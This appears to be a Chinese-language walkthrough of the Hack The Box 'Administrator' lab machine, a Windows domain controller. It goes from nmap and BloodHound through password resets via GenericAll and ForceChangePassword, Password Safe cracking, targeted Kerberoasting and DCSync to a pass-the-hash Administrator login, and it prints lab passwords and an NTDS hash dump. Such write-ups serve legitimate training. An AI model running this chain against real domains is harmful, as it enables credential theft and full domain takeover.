基本信息

1
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

端口扫描

21和常规windows域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ nmap -sC -sV -Pn 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-11 14:00 CST
Nmap scan report for 10.10.11.42
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 12:48:32Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-11T12:48:37
|_  start_date: N/A
|_clock-skew: 6h47m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.03 seconds

bloodhound

使用给出的账号密码进行bloodhound收集分析:

1
2
3
10.10.11.42 dc.administrator.htb administrator.htb

bloodhound-python -u Olivia -p ichliebedich -d administrator.htb -c All --zip  --dns-tcp -ns 10.10.11.42

Olivia可以winrm登录:

Olivia也对Michael有GenericAll:

Michael

那就滥用GenericAll,简单的直接改密码后winrm登录

Michael接下来又对Benjamin有ForceChangePassword:

Benjamin

继续修改Benjamin的密码:

1
bloodyAD --host 10.10.11.42 -d Administrator.htb -u Michael -p ichliebedich set password Benjamin ichliebedich

ftp

Benjamin是SHARE MODERATORS组成员,可以登录FTP,得到一个Backup.psafe3文件:

Password Safe

psafe3是Password Safe文件,类似keepass的密码管理器:

破解方式也是类似的:

1
2
3
4
5
pwsafe2john Backup.psafe3 > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

tekieromucho

使用得到的master密码打开psafe文件,得到其中保存的密码:

1
2
3
alexander UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma WwANQWnmJnGV07WQN8bMS7FMAbjNur

emily & user flag

emily可以winrm登录,桌面得到user flag

1
evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

提权信息

接下来路径就很明确了,emily对ethan有GenericWrite,ethan可以dcsync:

ETHAN

写spn后打kerberoast:

1
2
3
4
5
python3 targetedKerberoast.py -d Administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan --dc-ip 10.10.11.42

sudo hashcat -m 13100 hash.txt ~/Tools/dict/rockyou.txt

limpbizkit

dcsync

ethan可以dcsync:

1
2
3
python3 examples/secretsdump.py ethan:limpbizkit@10.10.11.42 -just-dc-ntlm -just-dc-user Administrator
 
 3dc553ce4b9fd20bd016e098d2d2fd2e

root flag

得到Administrator hash登录:

1
evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python3 examples/secretsdump.py ethan:limpbizkit@10.10.11.42 -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fca453a5e95a98ab61a2cf00302a0431:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fca453a5e95a98ab61a2cf00302a0431:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Cleaning up...

参考资料